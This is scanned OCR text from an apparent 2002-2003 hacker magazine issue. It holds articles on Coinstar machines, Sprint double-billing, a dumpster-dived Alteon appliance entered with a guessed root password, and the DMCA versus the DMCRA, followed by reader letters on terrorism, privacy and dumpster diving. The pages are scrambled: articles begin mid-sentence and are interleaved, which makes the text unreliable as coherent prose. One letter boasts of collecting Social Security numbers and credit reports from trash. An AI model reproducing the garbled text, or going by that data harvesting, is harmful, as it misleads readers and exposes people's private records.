the coins are run through a process which sorts out 
any debris, including washers, paperclips, and 
anything else that might be in a jar of coins. These 
objects fall into a plastic tray above the sorting 
mechanism, and are not returned to the user. 

The coins then fall into one of two bins: an all- 
pennies bin (pennies make up much of Coinstar's 
business) and a bin for the rest of the coins. In ac- 
tuality, the coins must be taken by armored car to 
another sorting facility where they must be sorted 
once again, as a treasury requirement. 

When the process completes, a receipt is spit 
out of the receipt printer, with several security fea- 
tures: (1) The Coinstar logo is displayed on the 
right and left side of the tape when held under ul- 
traviolet light; (2) On the rear of the receipt, there 
is a small box with nothing in it. If a coin is rubbed 
across the box, the Coinstar logo appears. 

However, far more interesting than the actual 
machine is the Coinstar network. Each machine 
contains a modem and a phone. Each machine di- 
als the Coinstar headquarters every night and 
downloads the day's usage statistics. These include 
the number of coins counted, what types of coins 
were counted, the number of transactions, the av- 
erage dollar amount per transaction, and the reject 
percentage (used in determining if a machine is re- 
jecting an excessive amount of coins, which is 
cause for a technician to be sent out to examine it). 
A normal reject percentage is around one percent, 
however slightly higher percentages may be sim- 
ply due to people inserting all kinds of foreign 
matter into the machines. 

In addition, the machine analyzes the last 
week's worth of usage statistics, and estimates the 
day it will be full. An armored car will then be 
scheduled to empty the machine on that day, or 
possibly earlier. The machines also contain diag- 
nostic software that will automatically page a tech- 
nician if a problem occurs. 

Occasionally, Coinstar sends software updates 


by area 51 

Located across the United States, and now in 
parts of the United Kingdom and Canada, Coinstar 
machines are situated in supermarkets everywhere. 
Large and green (in the US - blue in foreign mar- 
kets), the machines accept unrolled, unsorted 
change and spit out a voucher redeemable for cash 
for a processing fee. While the concept is simple, 
Coinstar has more to it than meets the eye. As a 
previous investor in the company and a frequent 
user of their machines, I have learned a great deal 
about how they work. 

The machine itself consists of a CRT monitor, 
receipt printer, two large plastic bins which hold 
change, a mechanism for sorting change, a mo- 
dem, and (surprisingly) a telephone. The machine 
is controlled by four large buttons, one green, one 
red, and two gray (newer machines have slightly 
different configurations). The user presses the 
green button several times to enter into the coin 
processing mode, at which point they dump their 
change into a metal tray. The change falls through 
a small slot, where it drops down into the sorting 
mechanism. If too much is change is dropping into 
the sorting mechanism, the slot closes temporarily 
to allow the sorting mechanism to catch up. 

The sorting mechanism itself does not involve 
the size or the weight of the coin, as this is too 
slow a process and causes too many errors in the 
identification of coins. Rather a complicated 
process involving electromagnetic identification is 
used. Coinstar currently holds U.S. Patent Number 
6,196,371 for the device and the abstract of the 
patent provides a good explanation of how it 
works: 

"Coins, preferably after cleaning, e.g. using a 
trommel, are singulated by a coin pickup assembly 
configured to reduce jamming. A coin rail assists in 
providing separation between coins as they travel 
past a sensor. The sensor provides an oscillating 
electromagnetic field generated on a single sensing 
core. The oscillating electromagnetic field is com- 
posed of one or more frequency components. The 
electromagnetic field interacts with a coin, and 
these interactions are monitored and used to clas- 
sify the coin according to its physical properties. 
All frequency components of the magnetic field 
are phase-locked to a common reference fre- 
quency. The phase relationships between the vari- 
ous frequencies are fixed, and the interaction of 
each frequency component with the coin can be 
accurately determined without the need for com- 
plicated electrical filters. In one embodiment, a 
sensor having a core, preferably ferrite, which is 





Page 25 


Winter 2002-2003 






How Sprint Raises Quick Cash) — EXPOSING tHe Coinstar 
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Again, we still have the same 
negative balance. Apparently, 
Sprint's policy is to credit any 
negative balances on paper but 
not in reality. They get to hold 
onto our money and at the same 
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Page: 
Billing Period Ending: 8/23/02 
Statement Date: 8/24/02 
Customer Number: 









Summary of Charges 


Here's our August 
Sprint bill - a little 


higher than usual, but 
otherwise normal. 








Well, here's a neat trick. They charged us twice! And from two different states. This 
is what we get for trusting them to do an automated credit card payment each month. 


age: 
Billing Period Ending: 9/23/02 
Statement Date: 9/24/02 

Customer Number: 


At least they caught their 
mistake and have given 
us a negative balance. 
But why would they be 
submitting another 
charge to our credit card? 


Summary of Charges 


Balance Account SPRINT Taxes and Submitted 
imm imm | بت‎ 
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Page: 1 
Billing Period Ending: 10/23/02 
Statement Date: 10/24/02 
Customer Number: 


Summary of Charges time claim we have a credit 
with them. When we finally 
called them on it, they asked if 
we would like to have it 
"applied" to our account. As if 

there was a SINGLE advantage 
to keeping it stuck here! 








From there I got a bit more curious and 
wanted to expand the system some more. 1 
added 256M of RAM, then attempted to add a 
20Gig HDD and a CDROM. I didn't have much 
luck with that, but found out if I removed the 
CF Card I could use the HDD on ۶ 
where the CF used to be. After a bit more play- 
ing, I got Linux installed on the 20 Gig drive on 
/dev/hde and it was working fine as a home 
server. 

The system provided me with well over a 
month of fun and learning, as well as some in- 
teresting calls to Nortel trying to understand the 
BIOS and restrictions set into it. Granted I did 
not get much information - it was brought to my 
attention that resetting it required removing and 
adding a new BIOS chip which I am too lazy to 
do. 

The moral of this long winded article? 
Dumpster diving can provide you with expen- 
sive treasures and a long time of fun and 
learning. 

Thanks to 404 and Tyler for assistance on 
systems running CompactFlash cards and the 
rest of Textbox Networks for help on other areas 
of learning the system. 

Related Sites 
Alteon Users Guide: http://www 142.nortelnet 
works.com/bvdoc/alteon/isd. ss/050125.C.pdf 
Teknor Applicom PCI-946-1 Hardware Guide: 
http://www.kontron.com/techlib/manuals/PCI- 
946-1_and_P3S440BX_manual.pdf 


information in the manual (page 108 of the 
PDF), and set up to find a way to add my own. 

With an old P-II board that got fried, I cut 
out its PS/2 keyboard connector with some 
snips, removed the excess solder from the pins, 
and cleaned it up for a better connection. I had 
to figure out a way to set up the connector 
around the way this case was set up. In the true 
form of imprecision, I grabbed a nice length of 
Cat5 cable (once again found dumpster diving) 
and stripped the ends of the wires bare for a 
connection. After some solder work we had the 
wires connected to the PCI-964 board and ran 
the Cat5 to the back of the system to another 
hole provided for another serial port. The con- 
nector was soldered on at the other end and 
some electrical tape to guard the bare wires and 
pins from the case. 

Plugging up a keyboard, I started it up and 
saw the damage that could be done. During the 
BIOS load, the keyboard lights came on, and 
Red Hat Linux began to boot. Staring at the Lo- 
gin/Password prompt I was quite excited. Of 
course I started with a quick basic guess for root 
with the password alteon and there I sat at a 
working console. 

A quick browse around to see what was 
there and I powered it down. I removed a crypto 
card and popped in a 3Com NIC, rebooted, 
brought up the interface, and turned on SSH. A 
few changes to set it all up automatically for 
me, another power down, removal of the video 
card, and brought it back up. I now had a system 
to play with at my desk for more comfort. 


DMCA vs. DMCRA 


right statues to accommodate new material. The 
DMCA is just the next step in the series of mod- 
ifications to the copyright statutes. There were 
other reasons for the DMCA's enactment. At the 
1996 World Intellectual Property Organization 
Diplomatic Conference, the U.S. adopted the 
World Intellectual Property Organization treaty. 
There was a perceived need to comply with that 
treaty; the DMCA made that compliance but 
added much more than was necessary. Copy- 
right owners were rightly concerned that their 
works would be pirated on the digital frontier. 
Congress did not intend for the DMCA to be 
abused as it is so today. The DMCA was en- 
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‘by Alex Daniel ۰۵ ۰ — 

The Digital Millennium Copyright Act 
(DMCA) and the Digital Media Consumers' 
Rights Act (DMCRA) are at the opposite ends 
of the "copyright rights" axis, so to speak, Rep- 
resentative Boucher and Doolittles DMCRA 
will amend the changes made by the DMCA to 
prevent the corporate abuses of power that have 
been possible under the DMCA. 

The DMCA was enacted in 1998 to take ef- 
fect in the year 2000, The DMCA modified the 
U.S. copyright statutes to provide protection for 
copyrighted digital material. Since 1790 Con- 
gress has made modifications to the U.S. copy- 
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ground, or at least have the capability to do so. 

In addition, the machines contain a phone that 
is linked directly into the Coinstar network. If a 
store employee needs to schedule maintenance, 
check the next coin pickup, or do any number of 
other things, he just needs to open the machine (it 
is locked with a key) and pick up the phone. Also, 
when the machine is opened, a pin code must be 
entered to obtain access to the diagnostic software, 
statistics, and to change the options of the ma- 
chine. This code is also needed to access the 
phone. I personally have not had the opportunity to 
access this part of the machine, mainly due to the 
lock and the security cameras right next to it (how- 
ever, the lock is the main obstacle). 

For all its ease of use, a lot of technology sits 
behind the green plastic of a Coinstar machine, 
much of which I still have yet to uncover. 


cards. The CPU was an Intel Celeron 500, 64M 
RAM chip, and a 64M CF card as its drive, 
Looking more into it, I noticed there was no 
keyboard port, or a video connector at all, so 
getting into a console would be a slight 
challenge. 

After writing down part numbers, I put it 
back together and did a few searches. It ap- 
peared I had an Alteon iSD-100 and off I was on 
a search for technical documentation, Hooking 
it up and attempting to power it on, I found the 
power button was broken off. A pen tip was all I 
needed, and the whir of the fans chimed through 
the room. Running a serial cable from its serial 
port to my system, I tried to get a console that 
way with no luck. 

After a bit more reading, I discovered a need 
for an Alteon WebSwitch to access the system, 
So it was time for a lot more research. 

The board inside was labled Teknor Appli- 
com, Inc., with a PCI-946-1 system board. By 
using a PCI Video Card, I was able to remove 
the Fiber card and replace it to get a video out- 
put of what was going on during boot. | was 
quite pleased to see the system was fully 
functional and booting fine. 

The manual for the board showed the pin 
outs for its connectors, which was a wonderful 
help. I was able to find the keyboard interface 
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to the machines to fix bugs, add features, and ad- 
vertise promotions. These updates are also down- 
loaded to the machines during this time period. 

AII of these statistics are stored on servers at 
Coinstar's headquarters in Bellevue, Washington, 
and many employees can access them over the net- 
work through software loaded on their computers. 
I received a tour of the headquarters several years 
ago, and at the time all the servers were running 
NT 4.0. 

I did notice another interesting feature while at 
Coinstar Headquarters. They had a row of ma- 
chines, dating from the earliest machine through 
their future models that had not yet been released. 
Some machines were on and functioning, others 
were off. However, one (a current model) dis- 
played a "Press CTRL-ALT-DEL to logon" mes- 
sage, as commonly seen in Windows NT 3 and 4. 
For this reason, I have à suspicion that the ma- 
chines run some form of Windows in the back- 





by phantasm 
phantasm G textbox.net 

Among many of the things I love to take part 
in, dumpster diving always has that small thrill 
of actual treasure hunting. Sooner or later you 
are bound to find a manual with enough infor- 
mation to keep you reading for a few days or 
even months. Other times you may get lucky 
and find an old computer that has parts you can 
use. 

A few months ago, during my weekly dive 
excursion, I happened to stumble upon quite a 
treasure in my favorite dive spot. On top of the 
dumpster sat a beautiful green system, just un- 
der 18" wide, 24" deep, and 1.7 inches tall. I 
was quite excited about finding something aside 
from the usual post-it note about where they 
were going to eat, or the regular office memo to 
put cigarettes in the ashtray outside and not on 
the sidewalk. 

I dropped my umbrella, and after a few at- 
tempts to get to the top of the dumpster, I made 
it and put it in my car. Unsure of what exactly it 
was, I dug around a bit more for a manual or 
something about it and found nothing. 

Later that evening I got home and peeled it 
apart, noting it was quite compact internally. In- 
side were three PCI slots used by a Fiber Giga- 
bit Ethernet adapter and two CryptoSwift SSL 
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of prosecution for discoveries. Security can 
again be developed, unimpeded by the DMCA. 
Proper labeling of "copy-protected CDs" will 
also be ensured. This new breed of CDs, mar- 
keted as regular CDs, have been known to have 
playback problems and have also crashed quite 
a few computers with their aggressive 
protection measures. 

This bill has already won the support of 
many major public entities. The supporters in- 
clude; Intel Corporation, Phillips Consumer 
Electronics North America, Sun Microsystems, 
Verizon, Gateway Consumer Electronics Asso- 
ciation, American Library Association, Associa- 
tion of the American Universities, Association 
of Research Libraries, American Association of 
Law Libraries, Medical Library Association, 
Special Liberties Association, Digital Future 
Coalition, Consumers Union, National Writers 
Union, Home Recording Rights Coalition, 
American Foundation for the Blind, and the 
Electronic Frontier Foundation. Many of the 
supporters are library or writer associations of 
some kind. It can be inferred that the libraries 
and writers may fear the DMCA as the means to 
an end of an era, an era of free speech and fair 
use. 

The way is now clear - the public's rights are 
threatened and the DMCRA is their boon. Li- 
braries and writers across the United States 
gather under the DMCRA's flag. Without the 
DMCRA organizations like the MPAA gain 
more of a foothold in our society. Organizations 
like the Electronic Frontier Foundation have 
long known the effects of the DMCA and the 
power it grants to corporations. The MPAA's 
actions have paid off, but not in their favor. The 
average citizen has at least heard of the DMCA 
and many have now joined the fight against it. 
When the DMCRA is enacted, the power will be 
returned to the people. 

Greetz: Kahlan, Zim, Bill and Ducky. Save 
Farscape. 





after SDMI had given Felten and his team per- 
mission to circumvent their watermarking tech- 
nologies, they were still able to revoke the right 
of free speech with the DMCA. Felten's team 
brought suit against SDMI and subsequently 
made a partial release of their research. 

Prominent Dutch cryptographer Niels Fer- 
guson recently discovered major flaws in a 
commercial hi-definition video encryption sys- 
tem. Ferguson rightly fears legal action under 
the DMCA and has therefore declined to release 
any of his work. He doesn't talk to his peers and 
scientific colleagues for fear of his research 
simply reaching the U.S. which he thinks could 
be interpreted as a violation of the DMCA. 

This shows the beginning of a horrible trend. 
Scientists are withholding research or simply 
avoiding the U.S. out of fear. Scientific devel- 
opment in the U.S. is being stifled for the bene- 
fit of the corporation. Scientists now fear the 
U.S. They fear the "Land of the Free" because 
corporations are given power over individual 
rights. 

The DMCRA will give that power and the 
rights back to the consumer. This bill will re- 
store the historical balance between copyright 
holders and the end user. If this bill passes in the 
next session, the rights that the DMCA 
threatens will be restored. 

It will reaffirm the fair use doctrine in the 
digital world, making it legal to circumvent a 
technological measure preventing access as 
long as the circumvention falls within the 
guidelines of the fair use doctrine. It adds ex- 
emptions for scientific research which reestab- 
lishes the Betamax standard. The Betamax 
standard would, in the digital world, allow the 
manufacture and distribution of software or 
hardware that can be used to circumvent tech- 
nological protection measures as long as it has a 
legitimate use. The reestablishment of the Beta- 
max standard would put scientists at ease and 
encourage scientific research to continue as it 
always has in an open forum style without fear 
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the DMCA to punish Sklyarov for speaking out 
about his research. After months of imprison- 
ment Sklyarov was finally released under an 
agreement with the Department of Justice. After 
his release the DMCA continued to prosecute 
his employer, ElcomSoft, under the criminal 
provisions of the DMCA. ElcomSoft is based in 
Russia where there is no DMCA. The DMCA is 
reaching across continents to stifle free speech. 

Prior to this, the Motion Picture Association 
of America (MPAA) brought suit against 2600 
Magazine for publishing DeCSS on its website, 
DeCSS is an open source application that al- 
lows Linux users to play DVDs. DeCSS's pri- 
mary use is a DVD player. It also has the ability 
to change file formats from DVD to MPG 
which is like playing a DVD and recording it to 
a VHS tape (which is, again, legal under the fair 
use doctrine). Because it can do this it has be- 
come the target of the MPAA through the 
DMCA. 2600 was not accused of being in- 
volved in the development of this tool, nor was 
it accused of having used the software for copy- 
right infringement. The lawsuit was brought 
upon 2600 simply for making the source code 
available. Free speech was denied to 2600 when 
they were enjoined from publishing the DeCSS 
source code. 2600 lost the case and lost the ap- 
peal. Some good can be said to have come of 
this though - it was decidedly the most public 
display of the dangers of the DMCA yet. The 
case provided a wake-up call to the hacker com- 
munity and gave the world a glimpse of what 
corporations can do with the DMCA. 

In September of 2000 the Secure Digital 
Music Initiative (SDMI) issued a public chal- 
lenge encouraging the hacker community to de- 
feat new watermarking technologies the SDMI 
hoped to use to thwart piracy. Professor Edward 
Felten and his team of researchers from Prince- 
ton, Rice, and Xerox took up the challenge and 
succeeded in circumventing the watermark con- 
trols on the music files. When the team tried to 
show their research at the 2001 Usenix confer- 
ence, the SDMI threatened Felten with the 
DMCA. The threat was in the form of a letter 
that was delivered to Felten and his team as well 
as their employers. Sharing research such às 
Felten's is common practice in the computer sci- 
ence field. It shows others' mistakes and can 
only lead to better solutions. If Felten and his 
team presented their research the original secu- 
rity technology would of course be compro- 
mised, but many would offer suggestions to 
improve or replace the weak technology. Even 
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acted to clear the gray area of pirating copy- 
righted digital works and to ban the "black box" 
type devices intended for that purpose. In prac- 
tice it has worked to that end and beyond. The 
new clauses and provisions to the copyright 
statutes have been abused aggressively to stifle 
and control many legitimate activities. The 
DMCA added anti-circumvention measures to 
the copyright statutes that forbid under penalty 
of law gaining access to a work by "circumvent- 
ing a technological protection measure that 
would otherwise effectively control access to a 
copyrighted work". The DMCA also prevents 
the import, manufacture, or export of any 
device that can circumvent that protection. 

By doing this the DMCA gives copyright 
holders complete control over their works, no 
matter what the circumstances. Historically, the 
U.S. copyright laws haven't given copyright 
holders this total control. A major "safety" on 
this type of control is the fair use doctrine. Fair 
use allows the end user to make copies of a 
copyrighted work for personal use, educational 
use, use in commentary, criticism, and parody 
or any other solely socially beneficial use. A 
work protected by the DMCA cannot be copied 
by the end user without the express consent of 
the copyright holder. This completely nullifies 
the fair use doctrine and tilts the balance of 
power dangerously toward the copyright hold- 
ers, By the same means the DMCA takes away 
the rights of First Sale and Limited Time. First 
Sale gives the end users the right to sell a copy 
of a work over and over once it is made. Lim- 
ited Time limits the time that a copyright is in 
effect. The copyright is granted for a limited 
time and after that time is up the work goes into 
the public domain. 

The power that copyright holders now have 
over these rights is shown in their use of the 
DMCA. Dimitry Sklyarov, a young Russian 
Ph.D. at Moscow University, was invited to 
speak at Defcon about some of his research. His 
speech outlined Adobe's e-Book security and its 
weaknesses. He and his company had devel- 
oped a program that allowed the end user to 
make copies of an Adobe e-Book, which was 
completely legal in Russia but illegal under the 
DMCA. He was arrested. Not for copyright in- 
fringement or for helping anyone else infringe 
upon copyright, but solely for citing weak- 
nesses in e-Book security. He was arrested be- 
cause someone he never met might use what he 
learned through his research to copy an e-Book 
without the publisher's permission. Adobe used 
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who espouses an objectionable point of vieworrunsa 
controversial website, we're going to be facing 
problems of an entire different nature, 


Dear 2600: 

In your response in 19:1 to a lettér about cracking 
bank accounts ("Tracking Terrorists") you said, "If 
you really want to help, the best thing you can do is be 
observant and notice things that other.people may. not 
notice. Then let people know what you see." It seems 
to me that this goes against your opposition to the 
TIPS program. The TIPS program is really nothing 
more than à way to gather information that people had 
no easy way of reporting before. But of course people 
can't handle the fact that instead of having important 
criminal activity info reported to thousands of differ- 
ent sources, they want one contact point. There have 
been anonymous tip lines for other things for a long 
time. One that may help stop and solve crime doesn't 
sound that threatening to me. 

PLMN 

There's a difference between being observant and 
being an informant. We encourage the former mean- 
ing we believe people should notice things and tell the 
world what they see. It's kind of our theme. Encourag- 
ing people to report any "suspicious activity" of their 
neighbors (or total strangers) to the authorities is 
about the most unhealthy thing our society needs at 
this point. 


Dear 2600: 

So I was there waiting in line at the local FedEx 
for my laptop to come back from being serviced. I 
was behind three gentlemen of Middle Eastern nation- 
ality. Two of them were at the counter talking to a lady 
who worked there. I think they were trying to figure 
out when a package was going to arrive at its destina- 
tion. Anyhow, while I was looking at my slip. I 
glanced over at the very quiet third man who was sit- 
ting in a chair in front of me. He had a piece of paper 
and a manila envelope in his hand. On the white piece 
of paper he had written everywhere 
"INS.DA.DOJ.DO?" (I couldn't make out the last 
character). This was written everywhere, on both sides 
too. Then he flipped his hand over and on the enve- 
lope he had a bunch of words written like a list or ad- 
dress. The only words I could make out were 
[something] Middle School. That's all I could get be- 
fore he got up to leave with the other two men. I don't 
think the envelope had been sent yet because the 
stamps didn't appear to have been crossed out yet by 
the post office. There were big stamps on it with pic- 
tures of a man with a hat on like Eddie Murphy wore 
in The Golden Child. The first thing that came to mind 
when 1 saw the characters on the letters were those 
letters with the anthrax. I didn't get their license plate 
for further tracking but they were driving a late 80's 
silver Honda Accord. My second thought was why the 
hell would an international terrorist just walk into a 
building holding "evidence?" So what the hell do I 
do? If I let it go and they kill someone, I am a bad per- 
son. If 1 call the police and he turns out to be practic- 
ing his English or he was just sending money to his 
family, I am a bad person. I haven't judged yet, but 
what would you do? I turned to you guys because 
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those of you who care, 1 am a born and raised North 
Carolinian (just in case it sounded like I was someone 
who didn't have any investment in the issue of terror- 
ism). Thanks to 2600 for continuing to fight the good 
fight. I hope you guys agree with me on this, but if not 
I'm sure you'll explain why. 
jmu 
This raises a number of interesting points. From 
our understanding, the owners of alneda.com simply 
didn't renew their domain name in time and someone 
else grabbed it. It's not quite the same thing as steal- 
ing the domain; it's really just a contest to see who's 
paying attention and, unless the name is part of a 
trademark, there's not a lot that can be done about it. 
It may seem unfair but if a domain is expired, it no 
longer belongs to anyone. What snapnames does is 
interesting - they will keep this from happening to you 
if you pay them and they will attempt to grab names 
you pay them for the moment they expire. We see no 
reason to outlaw this as they're not doing anything 
wrong. Ultimately their service will become ineffec- 
tive as more such companies pop up. If it can be 
proven that they're accepting money from both the do- 
main holder and the person who wants that same do- 
main, that would qualify as a ripoff in our book. As for 
what's currently on the site, it's a free speech issue. 
From what we've seen, anyone is welcome to partici- 
pate (not that they're obligated to allow this). What 
the person(s) behind it does for a living is really im- 
material to this, as is identifying what state you hap- 
pen to be from. Nobody's opinions are more or less 
valid because of their background or location. What 
we can agree on is that this really doesn't have a 
whole lot to do with hacking - it's simply about paying 
attention. 


Dear 2600; 

I know as do all of your other readers that you are 
against even the so called "white hat hacking" even if 
the site being attacked is an enemy of the state. 1 
would have to say that this is just the kind of thing that 
we in the hacking community should be doing. 

I do agree with you however that the attacking and 
redirecting of their funds is crossing the line. But 
there's nothing wrong with gathering "intel" on their 
agents, their movements, their strength, etc., and pass- 
ing it on to the appropriate channels so that appropri- 
ate plans can be made, as well as the monitoring of 
their electronic fund transfers as that will also give us 
intel on what they are planning. 

I would also have to say that we should support 
those who like Jon Messner through legal means took 
over ownership of a particular domain name. And 
considering that he did legally purchase the aforemen- 
tioned domain name when it was not being used (even 
if it was just for a "split-second," it was fair game), he 
did so in a fair and legal move. 

Herman 

As we said above, using an existing system to gain 
an advantage isn't the problem. But those who believe 
they should act as judge, jury, and executioner are de- 
luding themselves. How do you suppose you're going 
to be able to track down "enemy agents" in the first 
place? They don't exactly advertise their presence. 
And if you're going to turn anyone in to the authorities 
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hacker community and ۲ really appreciate your 


struggle and years of dedication. 
cybernard 
We wouldn't have gotten anywhere without our 
readers' support. They've made everything possible. 


Terrorism Related Issues 


Dear 2600: 

Anyone else notice the eerie resemblance between 
9/11 and its aftermath and Brain Damage's 2/9/9] 
broadcast? 

Tresser 

You're referring to an early radio broadcast on 
our website that theorized on the possibility of some 
kind of future attack on U.S. soil as a result of the Gulf 
War. Many people around the world had also consid- 
ered that possibility. And when the attacks came, it 
woke a lot more people up to the fact that our foreign 
policy can come back to haunt us right here. 


Dear 2600: 

This letter probably won't be the only one you get 
on John Messner, who has been getting a bit of atten- 
tion on the news lately for "hacking" alneda.com, an 
Al-Qaida website. He didn't really "hack" anything 
and it's just another example of how loosely the term 
is used. He just decided to give one of those domain 
snatching services (snapnames.com) a try and got 
lucky when the owners of alneda tried to switch name 
servers. I'm writing because Messner is being made 
out to be some kind of geek hero in the news. I don't 
think he is. In fact, I think he's the exact opposite of 
what computer enthusiasts want to be identified with. 
First of all, he's a porn king (having started some re- 
ally successful girl-next-door type site) which some 
people might find to be cool or whatever. I think it's 
just disgusting. Second of all, the only thing he did 
was get lucky with that name snatching service, which 
takes zero intelligence and only enough "skill" to fire 
up Internet Explorer. I had my name snatched by one 
of those things about a year ago and had to pay 150 
bucks to get it back. Not cool at all - they should be il- 
legal. Regardless of whether it was a terrorist website 
or not (actually it was just a pro-Islam site, but hey 
what's the difference after the 11th anyway?), those 
types of services are just bull and exploiting them like 
that is completely against what being a hacker is 
about. ['m all for fighting terrorism but this is just an- 
other example of someone taking it too far and the 
media glorifying it. We've already got the DMCA and 
Patriot Act to worry about - I don't want to have to 
look over my shoulder for vigilante porn bosses that 
want to get ahold of my website because they think 
they are somehow fighting terrorism. It also should be 
noted that alneda.com now links to a forum where 
people discuss world issues such as terrorism. Most of 
the talks there are one-sided as can be expected. For 
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Spreading News 


Dear 2600: 

Some readers may already know this, but sneake- 
mail.com is a service that allows one to generate dis- 
posable email addresses that forward to your real 
address. It provides a self documenting method of 
tracking who sells your email address so that you can 
confront those companies with proof that they sold 
your address. 

NoSpahm 


Dear 2600: 

In 19:2, you printed a letter from one "MW" who 
was asking about how to send anonymous faxes. For a 
small fee, this person could use an e-fax service such 
as www.maxemail.com to send a fax anywhere the 
user accesses the Internet. Using a good proxy server 
or other anonymous access point would allow the user 
to send an anonymous fax. 

Along these lines, users wishing to receive anony- 
mous faxes may find the free services of 
www.faxwave.com to be useful. They assign you a 
unique phone number (no extensions!) and receive the 
faxes for you. Upon receipt, the transmission is con- 
verted to a .tif file and emailed to any email address of 
your choosing. All numbers are issued from the 775 
area code and the exchange varies but is usually local 
to Reno, Nevada. 

Keith 


Dear 2600: 

This is regarding the fax from Direct Media 
America on page 13 of ۱9:3, Looks like there's an on- 
going investigation of Direct Media America by the 
Florida Attorney General. 

scott 
We certainly can't say we're surprised. 


Dear 2600: 

Many people probably already know about this, 
but www.payphone-project.com/ is a website with the 
phone numbers to thousands of payphones all around 


the States. 
Sardonicus 
Hopefully the kind that still take incoming calls. 
Dear 2600: 


I truly admire your magazine and how hard the 
staff of 2600 works to show us the information which 
the government and corporations try to control and 
distort. You're a group that the government tries to 
suppress like any group that stands against the system, 
one that will be targeted by those in "control" just to 
protect their own interest$. Soon I'll be starting a 2600 
meeting here in Puerto Rico with technological 
themes and political issues too, highly influenced by 
your magazine. You people are an inspiration for the 
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in the alt.dumpster newsgroup in Usenet-for all-sorts 
of discussion, etc. There's a lot to learn and we s 
information with all. No flames or trails, — 


away. | 
Feedback i 


Dee ye ery rete 


As if merely asking made the flames and fur; go 
| 


Dear 2600: 

I have been following the topic of right click sup- 
pression in your magazine for the last couple of issues 
and decided to put my two cents in. I am a photogra- 
pher and on my website, my gallery images have right 
click suppression on them. The reason for this is 
rather interesting. I feel that if you really appreciate an 
image that I have and want to have a copy of it, you 
should either contact me or, even better, find à way to 
work for it. This is one of the basic parts to hacking in 
my book, finding new ways of learning. It is not 
harmful or destructive, and if you find a way around 
something, than you have learned something new. 
Props to you, and keep up the good work. 

Traveler 


Dear 2600: 

In response to Erovi's comment about script kid- 
dies and the ratio of master to newbies: 

The way our world is now is fine when it comes to 
the script kiddies and the masters ratio. Both have dif- 
ferent goals. The masters' goal is to expand their abil- 
ities and show off by creating the program. 
Recognition for the program is among peers, not by 
the ignorant majority that is clueless to the true art of 
anything they do, Masters are happy how they are, 
programming. 

Script kiddies find joy in just breaking into school 
computers and by petty acts of malice that bring 
recognition by the ignorant masses. That makes the 
script kiddies happy. 

As long as everyone is happy, what's the problem? 

XiChimos 

We weren't aware that everyone was so happy. 
Perhaps we could join in a chorus of Ode To Joy if the 
people committing "petty acts of malice" stopped call- 
ing themselves hackers to the ignorant masses. 


Dear 2600: 

I just finished watching Freedom Downtime two 
minutes ago. I finally got around to ordering it and as 
soon as I got home and saw that package in my mail I 
opened it up and popped it in the VCR. I just want to 
say I thought it was great. I especially enjoyed the Mi- 
ramax protest and your across the country trip to get 
the word out about Kevin. 1 plan on making copies 
and giving them to my friends. I also hope to have a 
showing at my school. Thanks for taking the time to 
make such a great film and keep up the good work. 

joe 


Dear 2600: 

I just read the article in 19:2 about doubleclick.net 
and how evil it is, as well as the letter with a solution 
involving iptables. This is all fine and dandy, but it 


working for the government. Their lives got de- 
stroyed. He asked people to turn in anyone they 
thought was a commie. The only way out of it once 
you got called in was to name other people. If you 
didn't name other people, then you were a commie 
too. (Doesn't this kind of stuff just piss you off on how 
dumb people are?) 
Hells-own 
One thing that always happens during these dark 
periods is the emergence of collaborators who go 
along with such things and individuals who stand up 
and fight them. One thing we can almost guarantee is 
that you'll be very surprised who winds up in each 
camp. 


Dear 2600: 

Just wanted to let you know - your bright light is 
soon to be extinguished. One more major terrorist at- 
tack and your (and your type's) relevance will cease, 
your moment will have passed. This is the price you 
will pay for your arrogance and ignorance of human 
nature and history. Thinking any societal structures 
are infinitely perfectible - what dreadful nonsense. 
Don't blame anyone else (da man) for loss of civil lib- 
erties - look at da man in da mirror. When security and 
law and order are recklessly neglected and chaos and 
uncertainty threaten, the balance of societal priorities 
shifts. To quote Aragorn: "Are you scared? You're not 
scared enough." Better get used to your nightmares, 
they ain't going away anytime soon. Enjoy the dark- 
ness. 

P.S. I hear BuSpar is good. 

Kr00lee-O 

It may be a paranoid reaction but sometimes we 
get the distinct feeling that there are people out there 
who don't like us. 


Dumpster Diving 


Dear 2600: 

In response to your article on dumpster diving, in 
the UK a (creepy) chap called Benjamin Pell did this 
for a living, feeding info to the press and is estimated 
to have made over one million pounds from it. Test 
cases in the UK have decided that even though trash 
has been thrown away, it still belongs to the thrower, 
and is not "public domain." Funny old world. 

Paddy 


Dear 2600: 

Just thought I'd add to Grifter's brilliant article in 
19:2 about dumpster diving. Another great place to 
dive is behind small insurance sales businesses. No 
locks, no shreds, and especially, no food. I've found 
stacks (big stacks) of personal info like addresses, 
phone numbers, socials, credit reports, etc. Grifter 
brought up a nifty idea with the cardboard boxes as an 
excuse. That tidbit would have gotten me out of a few 
jams when I found running to be very necessary. Ap- 
parently backpacks aren't a good idea either. Happy 
diving! 

Nomad 
Dear 2600: 

Great article on Dumpster Diving by Grifter in 

19:2, Others who are interested can join fellow divers 


we allow our government to take away any of these 
freedoms, then the terrorism will have won a great 
victory. 

In Washington it is sad to see that many politicians 
who claim to support small and limited government 
have worked to extend government power to such a 
huge extent. The few voices of dissent have been for 
the most part drowned out. At the same time though, it 
has made for odd alliances. For example, some right- 
wing Republicans and liberal groups like the ACLU 
have found common ground in opposition to new 
government powers. The only way for us to fight this 
extension of government authority is to find people 
who think likewise in all parties, in all organizations, 
and join together to send a message to our govern- 
ment that we must not let the terrorists win by altering 
our way of life. 

LordKhamul 

Be careful not to fall into the propaganda pit re- 
garding who is evil and who is not. There are many 
countries with as bad or worse human rights records 
as Iraq who our government supports. We certainly 
don't want to defend their despotic regime but no de- 
finitive proof has ever been presented linking them to 
the attacks nor have they been caught acting aggres- 
sively outside their borders or planning to since the 
Gulf War, Something else seems to be at work in our 
latest drive against them. 

Not that it's any comfort at all, but terrorist acts 
against our people have probably got nothing to do 
with our way of life and everything to do with what 
our government is doing in our name in other coun- 
tries. That makes it especially important to know ex- 
actly what that is and to know where we as individuals 
stand. We also have to keep our eyes open for those 
right here at home who oppose the American way - 
not those who dissent, speak their minds, or represent 
something different. The real enemies are the ones 
who are trying to change the rules and wipe away any 
semblance of due process that hasn't already been de- 
stroyed - all in the name of their twisted definition of 
patriotism. As you've pointed out, fighting this goes 
across all party lines and requires only intelligence 
and open minds. 


Dear 2600: 

I was just reading your newest issue (19:3) and in 
your intro ("Freedom's Biggest Enemy") something 
caught my eye. "...Operation TIPS (Terrorist Informa- 
tion and Protection System) which proposes having 
members of the general public spy on people they 
